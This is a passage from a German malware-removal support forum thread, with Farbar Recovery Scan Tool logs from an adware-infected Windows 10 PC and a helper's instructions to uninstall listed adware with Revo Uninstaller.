2016-10-07 09:17 - 2016-10-07 09:17 - 00287216 _____ () C:\Program Files (x86)\Y2Go\bin\pt.exe
2016-10-07 09:16 - 2016-10-07 09:16 - 00340976 _____ () C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 04284416 _____ () C:\Program Files (x86)\mpck\wincom_VL5.exe
2016-09-29 09:07 - 2016-09-29 09:07 - 47824832 _____ () C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
2015-11-04 16:43 - 2015-11-04 16:43 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2016-09-29 09:02 - 2016-09-29 09:02 - 47813592 _____ () C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
2016-10-18 13:06 - 2016-10-18 13:06 - 01757184 _____ () C:\WINDOWS\Temp\E02F.tmp
2015-12-26 10:59 - 2015-12-26 10:59 - 00158720 _____ () C:\Users\maikp\AppData\Local\03AA02FC-1476796004-05C3-7606-B70700080009\qnsvF8F5.tmp
2016-09-28 16:35 - 2016-09-28 16:36 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-09-28 16:35 - 2016-09-28 16:36 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-09-28 16:35 - 2016-09-28 16:36 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2015-07-02 17:12 - 2015-07-02 17:12 - 01927680 _____ () C:\Program Files\SpaceSoundPro\SpaceSoundPro.dll
2016-10-08 20:58 - 2016-10-08 20:58 - 00277504 _____ () c:\program files (x86)\ferqesp\cletaspwsemnt.dll
2016-10-08 20:57 - 2016-05-27 11:36 - 00117248 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\48.0.2564.10\chrome_elf.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00258560 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01383616 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\ClientTelemetry.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00118976 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileSyncViews.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\maikp\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\unbenannt.png
DNS Servers: 188.120.239.115 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2EA584C8-BECC-4A4C-AF33-4E606E73CDAE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{436571FA-8515-4E9E-AAD9-2CC79F8602B9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{72C356B8-CB26-4DEC-BB66-1AD93604839B}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{530DE27F-6C7A-4697-9DB1-0BB50A971DAA}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{B955008F-C21E-4141-A531-9F2BEA4B6C5C}] => (Allow) C:\Users\maikp\AppData\Local\Temp\is-1Q78S.tmp\download\MiniThunderPlatform.exe

==================== Wiederherstellungspunkte =========================

14-10-2016 17:55:01 Removed Minecraft
17-10-2016 18:51:40 Malwarebytes Anti-Rootkit Restore Point

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (10/18/2016 12:58:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/18/2016 12:41:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Name des fehlerhaften Moduls: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Ausnahmecode: 0x40000015
Fehleroffset: 0x001262b4
ID des fehlerhaften Prozesses: 0x17b8
Startzeit der fehlerhaften Anwendung: 0x01d2292c3c82c7f4
Pfad der fehlerhaften Anwendung: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Pfad des fehlerhaften Moduls: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Berichtskennung: 7c89f799-16bc-41c6-ab53-f8ab23593b72
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (10/18/2016 12:14:18 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet

Error: (10/18/2016 12:13:23 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (10/18/2016 11:43:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Name des fehlerhaften Moduls: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Ausnahmecode: 0x40000015
Fehleroffset: 0x001262b4
ID des fehlerhaften Prozesses: 0x364
Startzeit der fehlerhaften Anwendung: 0x01d229241471d42d
Pfad der fehlerhaften Anwendung: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Pfad des fehlerhaften Moduls: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Berichtskennung: 52361614-d9ae-4fd7-a660-9a1169d30f86
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (10/17/2016 07:46:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Name des fehlerhaften Moduls: SpaceSoundPro.exe, Version: 1.0.0.1, Zeitstempel: 0x55bf6dd1
Ausnahmecode: 0x40000015
Fehleroffset: 0x001262b4
ID des fehlerhaften Prozesses: 0x1814
Startzeit der fehlerhaften Anwendung: 0x01d2289e6c508df0
Pfad der fehlerhaften Anwendung: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Pfad des fehlerhaften Moduls: C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
Berichtskennung: bcc4ddbd-e776-4482-8be4-de28bd49c07d
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (10/17/2016 07:44:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/17/2016 07:43:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{1d6218c4-44d5-4895-a5c7-88e39d593541}“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/17/2016 07:38:28 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet

Error: (10/17/2016 07:36:08 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.


Systemfehler:
=============
Error: (10/18/2016 12:48:31 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-CHK5R9U)
Description: Durch die Berechtigungseinstellungen für "Computerstandard" wird dem Benutzer "DESKTOP-CHK5R9U\maikp" (SID: S-1-5-21-1190326282-1682839636-2826347982-1002) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 und der APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 im Anwendungscontainer "Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy" (SID: S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/18/2016 12:41:34 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/18/2016 12:36:48 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "bf7821d4713d4971d25a53d8d6cb8f99" wurde mit folgendem Fehler beendet:
Unbekannter Fehler

Error: (10/18/2016 12:36:48 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "ad11222373fdc03dd874a65a6c6001bc" wurde mit folgendem Fehler beendet:
Unbekannter Fehler

Error: (10/18/2016 12:36:48 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "disqbus" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/18/2016 12:36:48 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "disqbus" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/18/2016 12:36:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Quoteex" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/18/2016 12:36:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bokvunnu" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/18/2016 12:35:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CHK5R9U)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (10/18/2016 12:35:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CHK5R9U)
Description: Der Server "{0002DF02-0000-0000-C000-000000000046}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2016-10-18 14:09:58.185
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:58.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:58.022
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.969
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.399
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.347
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.327
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.313
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.289
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-18 14:09:57.277
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: AMD A4-6300 APU with Radeon(tm) HD Graphics
Prozentuale Nutzung des RAM: 28%
Installierter physikalischer RAM: 7364.74 MB
Verfügbarer physikalischer RAM: 5252.48 MB
Summe virtueller Speicher: 8516.74 MB
Verfügbarer virtueller Speicher: 6251.79 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:916.15 GB) (Free:886.8 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 9CFC33A7)

Partition: GPT.

==================== Ende von Addition.txt ============================

cosinus 18.10.2016 17:11
Meine Fresse :schrei: da ist noch einiges zu tun!


Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:

    AppTrailers - AppTrailers for Desktop (HKLM-x32\...\AppTrailers) (Version: 9.1.10amt - AppTrailers) <==== ACHTUNG

    Body Text Feathering

    Caster

    CleanBrowser

    DPower version 1.0

    SafeFinder

    Search module

    shopperz

    Social2Search

    Social2Search

    System Healer

    trotux - Uninstall

    WIN

    YellowSend

    youndoo - Uninstall

  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 

RonnyP 19.10.2016 13:18
Hi, habe jetzt alle programme aus deiner liste entfernt. Hier ein neuer FRST Scan.

FRST 1/2

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
durchgeführt von maikp (Administrator) auf DESKTOP-CHK5R9U (19-10-2016 13:22:04)
Gestartet von C:\Users\maikp\Downloads
Geladene Profile: maikp (Verfügbare Profile: maikp)
Platform: Windows 10 Home Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
() C:\ProgramData\Logic Handler\set.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
() C:\Program Files (x86)\InterHop\InterHop.exe
() C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\kns9F11.tmp
() C:\Program Files (x86)\WebShield\WebShield.exe
() C:\ProgramData\NetworkPacketManitor\Nettrans.exe
() C:\Windows\SysWOW64\NetUtils2016.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
() C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
(Search Module Ltd.) C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe
() C:\Program Files (x86)\WinSaber\WinSaber.exe
() C:\Users\maikp\AppData\Local\03AA02FC-1476882363-05C3-7606-B70700080009\qnsx1F3F.tmp
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
(Microsoft Corporation) C:\Windows\System32\WpcMon.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
() C:\Program Files (x86)\mpck\wincom_VL5.exe
() C:\Program Files (x86)\Y2Go\bin\pt.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIPME.EXE
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
() C:\Windows\Temp\B058.tmp


==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-27] (Microsoft Corporation)
HKLM\...\Run: [WINCOMVL5] => C:\Program Files (x86)\mpck\wincom_VL5.exe [4284416 2016-10-08] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-11-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NUMPADL] => USBNUMP.exe
HKLM-x32\...\Run: [NUMCHK] => NumpChk.exe
HKLM-x32\...\Run: [DailyBee] => C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe [47813592 2016-09-29] ()
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [61648 2016-09-26] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIPME.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [WebDiscoverBrowser] => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [985312 2016-05-27] ()
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\MountPoints2: {32d903d3-7d5a-11e6-b073-806e6f6e6963} - "F:\InstallNavi.exe"
HKU\S-1-5-18\...\Run: [] => 0
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
GroupPolicyUsers\S-1-5-21-1190326282-1682839636-2826347982-1002\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [S-1-5-21-1190326282-1682839636-2826347982-1002] => Proxy ist aktiviert.
ProxyServer: [S-1-5-21-1190326282-1682839636-2826347982-1002] => http=127.0.0.1:8808;https=127.0.0.1:8808
Hosts: Hosts Datei wurde nicht im Standardordner gefunden
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [NameServer] 188.120.239.115,8.8.8.8
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [DhcpNameServer] 192.168.2.1
ManualProxies:

Internet Explorer:
==================
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYxkvGPup7Mg0M56BkMDSsdML4JBRvebV2qsEBaL_y70m-u5OhTvOG2ZcCHwEFZ0dQJWwB6ROxd_6oJGbn
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.hyrican.de
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> DefaultScope {9FFEE954-DB75-492A-B1CA-BA23C9B83007} URL = hxxp://www.searchpage.com/index.php?v=n11.12.1.13&os_mj=10&os_mn=0&os_bitness=64&mid=34ad48ad90a7763ca4a5b1eb450bf5bc&uid=E4380ECD4205EE69FB7D21E98448B14C&aid=3100&aid2=none&ts=1475952689&ts2=&psd=true&f=oJKf752nbc76&keywords={searchTerms}
